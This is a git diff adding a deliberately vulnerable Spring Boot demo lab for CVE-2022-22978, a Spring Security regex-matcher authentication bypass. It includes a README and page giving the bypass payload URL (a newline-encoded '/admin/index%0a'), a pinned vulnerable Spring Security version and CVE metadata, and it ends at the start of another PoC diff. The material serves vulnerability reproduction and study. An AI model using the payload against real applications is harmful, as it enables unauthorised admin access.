class file +*.class + +# Log file +*.log + +# BlueJ files +*.ctxt + +# Mobile Tools for Java (J2ME) +.mtj.tmp/ + +# Package Files # +*.jar +*.war +*.nar +*.ear +*.zip +*.tar.gz +*.rar + +# virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml +hs_err_pid* + diff --git a/cve/java-spring-security/2022/CVE-2022-22978/.mvn/wrapper/maven-wrapper.properties b/cve/java-spring-security/2022/CVE-2022-22978/.mvn/wrapper/maven-wrapper.properties new file mode 100644 index 0000000000000000000000000000000000000000..b7cb93e7050f42ff587aefbc40cc038ad4fa3271 --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/.mvn/wrapper/maven-wrapper.properties @@ -0,0 +1,2 @@ +distributionUrl=https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/3.8.4/apache-maven-3.8.4-bin.zip +wrapperUrl=https://repo.maven.apache.org/maven2/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar diff --git a/cve/java-spring-security/2022/CVE-2022-22978/Dockerfile b/cve/java-spring-security/2022/CVE-2022-22978/Dockerfile new file mode 100644 index 0000000000000000000000000000000000000000..f7771d2f0361ff6bbb8873bca924687e77e8fd38 --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/Dockerfile @@ -0,0 +1,5 @@ +FROM openjdk:8-jdk-alpine +MAINTAINER S0cke3t +EXPOSE 8080 +ADD target/CVE-2022-22978-0.0.1-SNAPSHOT.jar demo.jar +ENTRYPOINT exec java -jar /demo.jar \ No newline at end of file diff --git a/cve/java-spring-security/2022/CVE-2022-22978/README.md b/cve/java-spring-security/2022/CVE-2022-22978/README.md new file mode 100644 index 0000000000000000000000000000000000000000..d73d4d3c58ecd652c3bdd81a0cc42d1b9c396494 --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/README.md @@ -0,0 +1,12 @@ +### CVE-2022-22978 Spring-Security bypass Demo +>在Spring Security中使用RegexRequestMatcher且规则中包含带点号的正则表达式时,攻击者可以通过构造恶意数据包绕过身份认证 +### 影响范围 +>Spring Security 5.5.x < 5.5.7 +Spring Security 5.6.x < 5.6.4 +### 复现 +![img.png](img.png) +![img_1.png](img_1.png) +### Paylaod +>http://localhost:8080/admin/index%0a +### Docker +> docker pull s0cke3t/cve-2022-22978:latest \ No newline at end of file diff --git a/cve/java-spring-security/2022/CVE-2022-22978/img.png b/cve/java-spring-security/2022/CVE-2022-22978/img.png new file mode 100644 index 0000000000000000000000000000000000000000..3cd0812251ae3e69ff81e7180dd78659ba1ff3ec Binary files /dev/null and b/cve/java-spring-security/2022/CVE-2022-22978/img.png differ diff --git a/cve/java-spring-security/2022/CVE-2022-22978/img_1.png b/cve/java-spring-security/2022/CVE-2022-22978/img_1.png new file mode 100644 index 0000000000000000000000000000000000000000..7209864900bb1ff0df6a98b93d93f891a5414306 Binary files /dev/null and b/cve/java-spring-security/2022/CVE-2022-22978/img_1.png differ diff --git a/cve/java-spring-security/2022/CVE-2022-22978/mvnw b/cve/java-spring-security/2022/CVE-2022-22978/mvnw new file mode 100644 index 0000000000000000000000000000000000000000..8a8fb2282df5b8f7263470a5a2dc0e196f35f35f --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/mvnw @@ -0,0 +1,316 @@ +#!/bin/sh +# ---------------------------------------------------------------------------- +# Licensed to the Apache Software Foundation (ASF) under one +# or more contributor license agreements. See the NOTICE file +# distributed with this work for additional information +# regarding copyright ownership. The ASF licenses this file +# to you under the Apache License, Version 2.0 (the +# "License"); you may not use this file except in compliance +# with the License. You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, +# software distributed under the License is distributed on an +# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +# KIND, either express or implied. See the License for the +# specific language governing permissions and limitations +# under the License. +# ---------------------------------------------------------------------------- + +# ---------------------------------------------------------------------------- +# Maven Start Up Batch script +# +# Required ENV vars: +# ------------------ +# JAVA_HOME - location of a JDK home dir +# +# Optional ENV vars +# ----------------- +# M2_HOME - location of maven2's installed home dir +# MAVEN_OPTS - parameters passed to the Java VM when running Maven +# e.g. to debug Maven itself, use +# set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000 +# MAVEN_SKIP_RC - flag to disable loading of mavenrc files +# ---------------------------------------------------------------------------- + +if [ -z "$MAVEN_SKIP_RC" ] ; then + + if [ -f /usr/local/etc/mavenrc ] ; then + . /usr/local/etc/mavenrc + fi + + if [ -f /etc/mavenrc ] ; then + . /etc/mavenrc + fi + + if [ -f "$HOME/.mavenrc" ] ; then + . "$HOME/.mavenrc" + fi + +fi + +# OS specific support. $var _must_ be set to either true or false. +cygwin=false; +darwin=false; +mingw=false +case "`uname`" in + CYGWIN*) cygwin=true ;; + MINGW*) mingw=true;; + Darwin*) darwin=true + # Use /usr/libexec/java_home if available, otherwise fall back to /Library/Java/Home + # See https://developer.apple.com/library/mac/qa/qa1170/_index.html + if [ -z "$JAVA_HOME" ]; then + if [ -x "/usr/libexec/java_home" ]; then + export JAVA_HOME="`/usr/libexec/java_home`" + else + export JAVA_HOME="/Library/Java/Home" + fi + fi + ;; +esac + +if [ -z "$JAVA_HOME" ] ; then + if [ -r /etc/gentoo-release ] ; then + JAVA_HOME=`java-config --jre-home` + fi +fi + +if [ -z "$M2_HOME" ] ; then + ## resolve links - $0 may be a link to maven's home + PRG="$0" + + # need this for relative symlinks + while [ -h "$PRG" ] ; do + ls=`ls -ld "$PRG"` + link=`expr "$ls" : '.*-> \(.*\)$'` + if expr "$link" : '/.*' > /dev/null; then + PRG="$link" + else + PRG="`dirname "$PRG"`/$link" + fi + done + + saveddir=`pwd` + + M2_HOME=`dirname "$PRG"`/.. + + # make it fully qualified + M2_HOME=`cd "$M2_HOME" && pwd` + + cd "$saveddir" + # echo Using m2 at $M2_HOME +fi + +# For Cygwin, ensure paths are in UNIX format before anything is touched +if $cygwin ; then + [ -n "$M2_HOME" ] && + M2_HOME=`cygpath --unix "$M2_HOME"` + [ -n "$JAVA_HOME" ] && + JAVA_HOME=`cygpath --unix "$JAVA_HOME"` + [ -n "$CLASSPATH" ] && + CLASSPATH=`cygpath --path --unix "$CLASSPATH"` +fi + +# For Mingw, ensure paths are in UNIX format before anything is touched +if $mingw ; then + [ -n "$M2_HOME" ] && + M2_HOME="`(cd "$M2_HOME"; pwd)`" + [ -n "$JAVA_HOME" ] && + JAVA_HOME="`(cd "$JAVA_HOME"; pwd)`" +fi + +if [ -z "$JAVA_HOME" ]; then + javaExecutable="`which javac`" + if [ -n "$javaExecutable" ] && ! [ "`expr \"$javaExecutable\" : '\([^ ]*\)'`" = "no" ]; then + # readlink(1) is not available as standard on Solaris 10. + readLink=`which readlink` + if [ ! `expr "$readLink" : '\([^ ]*\)'` = "no" ]; then + if $darwin ; then + javaHome="`dirname \"$javaExecutable\"`" + javaExecutable="`cd \"$javaHome\" && pwd -P`/javac" + else + javaExecutable="`readlink -f \"$javaExecutable\"`" + fi + javaHome="`dirname \"$javaExecutable\"`" + javaHome=`expr "$javaHome" : '\(.*\)/bin'` + JAVA_HOME="$javaHome" + export JAVA_HOME + fi + fi +fi + +if [ -z "$JAVACMD" ] ; then + if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD="$JAVA_HOME/jre/sh/java" + else + JAVACMD="$JAVA_HOME/bin/java" + fi + else + JAVACMD="`\\unset -f command; \\command -v java`" + fi +fi + +if [ ! -x "$JAVACMD" ] ; then + echo "Error: JAVA_HOME is not defined correctly." >&2 + echo " We cannot execute $JAVACMD" >&2 + exit 1 +fi + +if [ -z "$JAVA_HOME" ] ; then + echo "Warning: JAVA_HOME environment variable is not set." +fi + +CLASSWORLDS_LAUNCHER=org.codehaus.plexus.classworlds.launcher.Launcher + +# traverses directory structure from process work directory to filesystem root +# first directory with .mvn subdirectory is considered project base directory +find_maven_basedir() { + + if [ -z "$1" ] + then + echo "Path not specified to find_maven_basedir" + return 1 + fi + + basedir="$1" + wdir="$1" + while [ "$wdir" != '/' ] ; do + if [ -d "$wdir"/.mvn ] ; then + basedir=$wdir + break + fi + # workaround for JBEAP-8937 (on Solaris 10/Sparc) + if [ -d "${wdir}" ]; then + wdir=`cd "$wdir/.."; pwd` + fi + # end of workaround + done + echo "${basedir}" +} + +# concatenates all lines of a file +concat_lines() { + if [ -f "$1" ]; then + echo "$(tr -s '\n' ' ' < "$1")" + fi +} + +BASE_DIR=`find_maven_basedir "$(pwd)"` +if [ -z "$BASE_DIR" ]; then + exit 1; +fi + +########################################################################################## +# Extension to allow automatically downloading the maven-wrapper.jar from Maven-central +# This allows using the maven wrapper in projects that prohibit checking in binary data. +########################################################################################## +if [ -r "$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" ]; then + if [ "$MVNW_VERBOSE" = true ]; then + echo "Found .mvn/wrapper/maven-wrapper.jar" + fi +else + if [ "$MVNW_VERBOSE" = true ]; then + echo "Couldn't find .mvn/wrapper/maven-wrapper.jar, downloading it ..." + fi + if [ -n "$MVNW_REPOURL" ]; then + jarUrl="$MVNW_REPOURL/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar" + else + jarUrl="https://repo.maven.apache.org/maven2/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar" + fi + while IFS="=" read key value; do + case "$key" in (wrapperUrl) jarUrl="$value"; break ;; + esac + done < "$BASE_DIR/.mvn/wrapper/maven-wrapper.properties" + if [ "$MVNW_VERBOSE" = true ]; then + echo "Downloading from: $jarUrl" + fi + wrapperJarPath="$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" + if $cygwin; then + wrapperJarPath=`cygpath --path --windows "$wrapperJarPath"` + fi + + if command -v wget > /dev/null; then + if [ "$MVNW_VERBOSE" = true ]; then + echo "Found wget ... using wget" + fi + if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then + wget "$jarUrl" -O "$wrapperJarPath" || rm -f "$wrapperJarPath" + else + wget --http-user=$MVNW_USERNAME --http-password=$MVNW_PASSWORD "$jarUrl" -O "$wrapperJarPath" || rm -f "$wrapperJarPath" + fi + elif command -v curl > /dev/null; then + if [ "$MVNW_VERBOSE" = true ]; then + echo "Found curl ... using curl" + fi + if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then + curl -o "$wrapperJarPath" "$jarUrl" -f + else + curl --user $MVNW_USERNAME:$MVNW_PASSWORD -o "$wrapperJarPath" "$jarUrl" -f + fi + + else + if [ "$MVNW_VERBOSE" = true ]; then + echo "Falling back to using Java to download" + fi + javaClass="$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.java" + # For Cygwin, switch paths to Windows format before running javac + if $cygwin; then + javaClass=`cygpath --path --windows "$javaClass"` + fi + if [ -e "$javaClass" ]; then + if [ ! -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then + if [ "$MVNW_VERBOSE" = true ]; then + echo " - Compiling MavenWrapperDownloader.java ..." + fi + # Compiling the Java class + ("$JAVA_HOME/bin/javac" "$javaClass") + fi + if [ -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then + # Running the downloader + if [ "$MVNW_VERBOSE" = true ]; then + echo " - Running MavenWrapperDownloader.java ..." + fi + ("$JAVA_HOME/bin/java" -cp .mvn/wrapper MavenWrapperDownloader "$MAVEN_PROJECTBASEDIR") + fi + fi + fi +fi +########################################################################################## +# End of extension +########################################################################################## + +export MAVEN_PROJECTBASEDIR=${MAVEN_BASEDIR:-"$BASE_DIR"} +if [ "$MVNW_VERBOSE" = true ]; then + echo $MAVEN_PROJECTBASEDIR +fi +MAVEN_OPTS="$(concat_lines "$MAVEN_PROJECTBASEDIR/.mvn/jvm.config") $MAVEN_OPTS" + +# For Cygwin, switch paths to Windows format before running java +if $cygwin; then + [ -n "$M2_HOME" ] && + M2_HOME=`cygpath --path --windows "$M2_HOME"` + [ -n "$JAVA_HOME" ] && + JAVA_HOME=`cygpath --path --windows "$JAVA_HOME"` + [ -n "$CLASSPATH" ] && + CLASSPATH=`cygpath --path --windows "$CLASSPATH"` + [ -n "$MAVEN_PROJECTBASEDIR" ] && + MAVEN_PROJECTBASEDIR=`cygpath --path --windows "$MAVEN_PROJECTBASEDIR"` +fi + +# Provide a "standardized" way to retrieve the CLI args that will +# work with both Windows and non-Windows executions. +MAVEN_CMD_LINE_ARGS="$MAVEN_CONFIG $@" +export MAVEN_CMD_LINE_ARGS + +WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain + +exec "$JAVACMD" \ + $MAVEN_OPTS \ + $MAVEN_DEBUG_OPTS \ + -classpath "$MAVEN_PROJECTBASEDIR/.mvn/wrapper/maven-wrapper.jar" \ + "-Dmaven.home=${M2_HOME}" \ + "-Dmaven.multiModuleProjectDirectory=${MAVEN_PROJECTBASEDIR}" \ + ${WRAPPER_LAUNCHER} $MAVEN_CONFIG "$@" diff --git a/cve/java-spring-security/2022/CVE-2022-22978/mvnw.cmd b/cve/java-spring-security/2022/CVE-2022-22978/mvnw.cmd new file mode 100644 index 0000000000000000000000000000000000000000..1d8ab018eaf11d9b3a4a90e7818ace373dfbb380 --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/mvnw.cmd @@ -0,0 +1,188 @@ +@REM ---------------------------------------------------------------------------- +@REM Licensed to the Apache Software Foundation (ASF) under one +@REM or more contributor license agreements. See the NOTICE file +@REM distributed with this work for additional information +@REM regarding copyright ownership. The ASF licenses this file +@REM to you under the Apache License, Version 2.0 (the +@REM "License"); you may not use this file except in compliance +@REM with the License. You may obtain a copy of the License at +@REM +@REM https://www.apache.org/licenses/LICENSE-2.0 +@REM +@REM Unless required by applicable law or agreed to in writing, +@REM software distributed under the License is distributed on an +@REM "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +@REM KIND, either express or implied. See the License for the +@REM specific language governing permissions and limitations +@REM under the License. +@REM ---------------------------------------------------------------------------- + +@REM ---------------------------------------------------------------------------- +@REM Maven Start Up Batch script +@REM +@REM Required ENV vars: +@REM JAVA_HOME - location of a JDK home dir +@REM +@REM Optional ENV vars +@REM M2_HOME - location of maven2's installed home dir +@REM MAVEN_BATCH_ECHO - set to 'on' to enable the echoing of the batch commands +@REM MAVEN_BATCH_PAUSE - set to 'on' to wait for a keystroke before ending +@REM MAVEN_OPTS - parameters passed to the Java VM when running Maven +@REM e.g. to debug Maven itself, use +@REM set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000 +@REM MAVEN_SKIP_RC - flag to disable loading of mavenrc files +@REM ---------------------------------------------------------------------------- + +@REM Begin all REM lines with '@' in case MAVEN_BATCH_ECHO is 'on' +@echo off +@REM set title of command window +title %0 +@REM enable echoing by setting MAVEN_BATCH_ECHO to 'on' +@if "%MAVEN_BATCH_ECHO%" == "on" echo %MAVEN_BATCH_ECHO% + +@REM set %HOME% to equivalent of $HOME +if "%HOME%" == "" (set "HOME=%HOMEDRIVE%%HOMEPATH%") + +@REM Execute a user defined script before this one +if not "%MAVEN_SKIP_RC%" == "" goto skipRcPre +@REM check for pre script, once with legacy .bat ending and once with .cmd ending +if exist "%USERPROFILE%\mavenrc_pre.bat" call "%USERPROFILE%\mavenrc_pre.bat" %* +if exist "%USERPROFILE%\mavenrc_pre.cmd" call "%USERPROFILE%\mavenrc_pre.cmd" %* +:skipRcPre + +@setlocal + +set ERROR_CODE=0 + +@REM To isolate internal variables from possible post scripts, we use another setlocal +@setlocal + +@REM ==== START VALIDATION ==== +if not "%JAVA_HOME%" == "" goto OkJHome + +echo. +echo Error: JAVA_HOME not found in your environment. >&2 +echo Please set the JAVA_HOME variable in your environment to match the >&2 +echo location of your Java installation. >&2 +echo. +goto error + +:OkJHome +if exist "%JAVA_HOME%\bin\java.exe" goto init + +echo. +echo Error: JAVA_HOME is set to an invalid directory. >&2 +echo JAVA_HOME = "%JAVA_HOME%" >&2 +echo Please set the JAVA_HOME variable in your environment to match the >&2 +echo location of your Java installation. >&2 +echo. +goto error + +@REM ==== END VALIDATION ==== + +:init + +@REM Find the project base dir, i.e. the directory that contains the folder ".mvn". +@REM Fallback to current working directory if not found. + +set MAVEN_PROJECTBASEDIR=%MAVEN_BASEDIR% +IF NOT "%MAVEN_PROJECTBASEDIR%"=="" goto endDetectBaseDir + +set EXEC_DIR=%CD% +set WDIR=%EXEC_DIR% +:findBaseDir +IF EXIST "%WDIR%"\.mvn goto baseDirFound +cd .. +IF "%WDIR%"=="%CD%" goto baseDirNotFound +set WDIR=%CD% +goto findBaseDir + +:baseDirFound +set MAVEN_PROJECTBASEDIR=%WDIR% +cd "%EXEC_DIR%" +goto endDetectBaseDir + +:baseDirNotFound +set MAVEN_PROJECTBASEDIR=%EXEC_DIR% +cd "%EXEC_DIR%" + +:endDetectBaseDir + +IF NOT EXIST "%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config" goto endReadAdditionalConfig + +@setlocal EnableExtensions EnableDelayedExpansion +for /F "usebackq delims=" %%a in ("%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config") do set JVM_CONFIG_MAVEN_PROPS=!JVM_CONFIG_MAVEN_PROPS! %%a +@endlocal & set JVM_CONFIG_MAVEN_PROPS=%JVM_CONFIG_MAVEN_PROPS% + +:endReadAdditionalConfig + +SET MAVEN_JAVA_EXE="%JAVA_HOME%\bin\java.exe" +set WRAPPER_JAR="%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.jar" +set WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain + +set DOWNLOAD_URL="https://repo.maven.apache.org/maven2/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar" + +FOR /F "usebackq tokens=1,2 delims==" %%A IN ("%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.properties") DO ( + IF "%%A"=="wrapperUrl" SET DOWNLOAD_URL=%%B +) + +@REM Extension to allow automatically downloading the maven-wrapper.jar from Maven-central +@REM This allows using the maven wrapper in projects that prohibit checking in binary data. +if exist %WRAPPER_JAR% ( + if "%MVNW_VERBOSE%" == "true" ( + echo Found %WRAPPER_JAR% + ) +) else ( + if not "%MVNW_REPOURL%" == "" ( + SET DOWNLOAD_URL="%MVNW_REPOURL%/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar" + ) + if "%MVNW_VERBOSE%" == "true" ( + echo Couldn't find %WRAPPER_JAR%, downloading it ... + echo Downloading from: %DOWNLOAD_URL% + ) + + powershell -Command "&{"^ + "$webclient = new-object System.Net.WebClient;"^ + "if (-not ([string]::IsNullOrEmpty('%MVNW_USERNAME%') -and [string]::IsNullOrEmpty('%MVNW_PASSWORD%'))) {"^ + "$webclient.Credentials = new-object System.Net.NetworkCredential('%MVNW_USERNAME%', '%MVNW_PASSWORD%');"^ + "}"^ + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $webclient.DownloadFile('%DOWNLOAD_URL%', '%WRAPPER_JAR%')"^ + "}" + if "%MVNW_VERBOSE%" == "true" ( + echo Finished downloading %WRAPPER_JAR% + ) +) +@REM End of extension + +@REM Provide a "standardized" way to retrieve the CLI args that will +@REM work with both Windows and non-Windows executions. +set MAVEN_CMD_LINE_ARGS=%* + +%MAVEN_JAVA_EXE% ^ + %JVM_CONFIG_MAVEN_PROPS% ^ + %MAVEN_OPTS% ^ + %MAVEN_DEBUG_OPTS% ^ + -classpath %WRAPPER_JAR% ^ + "-Dmaven.multiModuleProjectDirectory=%MAVEN_PROJECTBASEDIR%" ^ + %WRAPPER_LAUNCHER% %MAVEN_CONFIG% %* +if ERRORLEVEL 1 goto error +goto end + +:error +set ERROR_CODE=1 + +:end +@endlocal & set ERROR_CODE=%ERROR_CODE% + +if not "%MAVEN_SKIP_RC%"=="" goto skipRcPost +@REM check for post script, once with legacy .bat ending and once with .cmd ending +if exist "%USERPROFILE%\mavenrc_post.bat" call "%USERPROFILE%\mavenrc_post.bat" +if exist "%USERPROFILE%\mavenrc_post.cmd" call "%USERPROFILE%\mavenrc_post.cmd" +:skipRcPost + +@REM pause the script if MAVEN_BATCH_PAUSE is set to 'on' +if "%MAVEN_BATCH_PAUSE%"=="on" pause + +if "%MAVEN_TERMINATE_CMD%"=="on" exit %ERROR_CODE% + +cmd /C exit /B %ERROR_CODE% diff --git a/cve/java-spring-security/2022/CVE-2022-22978/pom.xml b/cve/java-spring-security/2022/CVE-2022-22978/pom.xml new file mode 100644 index 0000000000000000000000000000000000000000..861fa8cf22bbfcf4a161073a9f21ad953cb87622 --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/pom.xml @@ -0,0 +1,68 @@ + + + 4.0.0 + + org.springframework.boot + spring-boot-starter-parent + 2.7.0 + + + cc.saferoad + CVE-2022-22978 + 0.0.1-SNAPSHOT + jar + CVE-2022-22978 + CVE-2022-22978 + + 1.8 + 5.6.3 + + + + org.springframework.boot + spring-boot-starter-web + + + + org.springframework.boot + spring-boot-starter-tomcat + provided + + + org.springframework.boot + spring-boot-starter-test + test + + + org.springframework.boot + spring-boot-starter-security + + + org.springframework.boot + spring-boot-starter-thymeleaf + + + + + + + org.springframework.boot + spring-boot-maven-plugin + + + -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8989 + + + + + org.apache.maven.plugins + maven-surefire-plugin + + true + + + + + + diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/config/SpringSecurityConfig.java b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/config/SpringSecurityConfig.java new file mode 100644 index 0000000000000000000000000000000000000000..2415af494fc3f501484c9a5e08e03374dd1f480d --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/config/SpringSecurityConfig.java @@ -0,0 +1,16 @@ +package cc.saferoad.config; + +import org.springframework.context.annotation.Configuration; +import org.springframework.security.config.annotation.web.builders.HttpSecurity; +import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity; +import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter; + +@Configuration +@EnableWebSecurity +public class SpringSecurityConfig extends WebSecurityConfigurerAdapter { + + @Override + protected void configure(HttpSecurity httpSecurity) throws Exception{ + httpSecurity.authorizeRequests().regexMatchers("/admin/.*").authenticated(); + } +} diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/controller/Demo.java b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/controller/Demo.java new file mode 100644 index 0000000000000000000000000000000000000000..f32b5613d98e1cdd9eb85facfdc6c506f016fe22 --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/controller/Demo.java @@ -0,0 +1,21 @@ +package cc.saferoad.controller; + +import org.springframework.stereotype.Controller; +import org.springframework.web.bind.annotation.GetMapping; +import org.springframework.web.bind.annotation.RestController; + +/*@RestController*/ +@Controller +public class Demo { + @GetMapping("/admin/*") + public String Manage(){ + /*return "Manage page";*/ + return "manage"; + } + + @GetMapping("/") + public String User(){ + /* return "Hello bro";*/ + return "index"; + } +} diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/Cve202222978Application.java b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/Cve202222978Application.java new file mode 100644 index 0000000000000000000000000000000000000000..cc5f37e2c647846f39b430bad8094dea52ccf2fb --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/Cve202222978Application.java @@ -0,0 +1,13 @@ +package cc.saferoad.cve202222978; + +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.SpringBootApplication; + +@SpringBootApplication(scanBasePackages = {"cc.saferoad"}) +public class Cve202222978Application { + + public static void main(String[] args) { + SpringApplication.run(Cve202222978Application.class, args); + } + +} diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/ServletInitializer.java b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/ServletInitializer.java new file mode 100644 index 0000000000000000000000000000000000000000..08cf300168f25b5a660a3ef21f1e735bff3e57bd --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/ServletInitializer.java @@ -0,0 +1,15 @@ +package cc.saferoad.cve202222978; + +import org.springframework.boot.builder.SpringApplicationBuilder; +import org.springframework.boot.web.servlet.support.SpringBootServletInitializer; +import org.springframework.context.annotation.ComponentScan; + +@ComponentScan(basePackages = {"cc.saferoad"}) +public class ServletInitializer extends SpringBootServletInitializer { + + @Override + protected SpringApplicationBuilder configure(SpringApplicationBuilder application) { + return application.sources(Cve202222978Application.class); + } + +} diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/application.properties b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/application.properties new file mode 100644 index 0000000000000000000000000000000000000000..8b137891791fe96927ad78e64b0aad7bded08bdc --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/application.properties @@ -0,0 +1 @@ + diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/index.html b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/index.html new file mode 100644 index 0000000000000000000000000000000000000000..682abdc580cc2c2c695daacc5c1d0b42ef181a2a --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/index.html @@ -0,0 +1,14 @@ + + + + + CVE-2022-22978 + + +

+ CVE-2022-22978 Demo via Spring security 5.6.3
+ Manage page: /admin/index
+Payload: http://localhost:8080/admin/index%0a +

+ + \ No newline at end of file diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/manage.html b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/manage.html new file mode 100644 index 0000000000000000000000000000000000000000..eeb40f2a2586c458bb300f8c860a4765bba9303d --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/manage.html @@ -0,0 +1,10 @@ + + + + + Manage + + +

This is manage page

+ + \ No newline at end of file diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/Cve202222978ApplicationTests.java b/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/Cve202222978ApplicationTests.java new file mode 100644 index 0000000000000000000000000000000000000000..f24ec38900aa094f734e254cf7ad0c444330ddfb --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/Cve202222978ApplicationTests.java @@ -0,0 +1,13 @@ +package cc.saferoad.cve202222978; + +import org.junit.jupiter.api.Test; +import org.springframework.boot.test.context.SpringBootTest; + +@SpringBootTest +class Cve202222978ApplicationTests { + + @Test + void contextLoads() { + } + +} diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/RegexRequestMatcherTests.java b/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/RegexRequestMatcherTests.java new file mode 100644 index 0000000000000000000000000000000000000000..864b85738029d0a6e209192980c61b55a0eaf06f --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/RegexRequestMatcherTests.java @@ -0,0 +1,17 @@ +package cc.saferoad.cve202222978; + +import org.junit.jupiter.api.Test; +import org.springframework.mock.web.MockHttpServletRequest; +import org.springframework.security.web.util.matcher.RegexRequestMatcher; +import static org.assertj.core.api.Assertions.assertThat; + +public class RegexRequestMatcherTests { + + @Test + public void matchesWithLineFeed() { + RegexRequestMatcher matcher = new RegexRequestMatcher(".*", null); + MockHttpServletRequest request = new MockHttpServletRequest("GET", "/blah%0d"); + request.setServletPath("/blah\r"); + assertThat(matcher.matches(request)).isTrue(); + } +} diff --git a/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml b/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml new file mode 100644 index 0000000000000000000000000000000000000000..d24bc4c46e961197ebf259961d2524b3ff31130b --- /dev/null +++ b/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml @@ -0,0 +1,22 @@ +id: CVE-2022-22978 +source: + https://github.com/DeEpinGh0st/CVE-2022-22978 +info: + name: Authorization Bypass in RegexRequestMatcher of Spring Security + severity: critical + description: | + 在Spring Security中使用RegexRequestMatcher且规则中包含带点号的正则表达式时,攻击者可以通过构造恶意数据包绕过身份认证 + scope-of-influence: + Spring Security 5.5.x prior to 5.5.75.5.6 + Spring Security 5.6.x prior to 5.6.45.6.3 + Spring Security Earlier unsupported versions + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-22978 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22978 + cwe-id: None + cnvd-id: None + kve-id: None + tags: cve2022, spring-security \ No newline at end of file diff --git a/cve/java-spring/2022/CVE-2022-22963/CVE-2022-22963-POC.py b/cve/java-spring/2022/CVE-2022-22963/CVE-2022-22963-POC.py index fde2123952880b54faf2c853c0634e5d8f876614..2932dc34d94915a38d57cce8a1f70c65d430989e 100644 --- 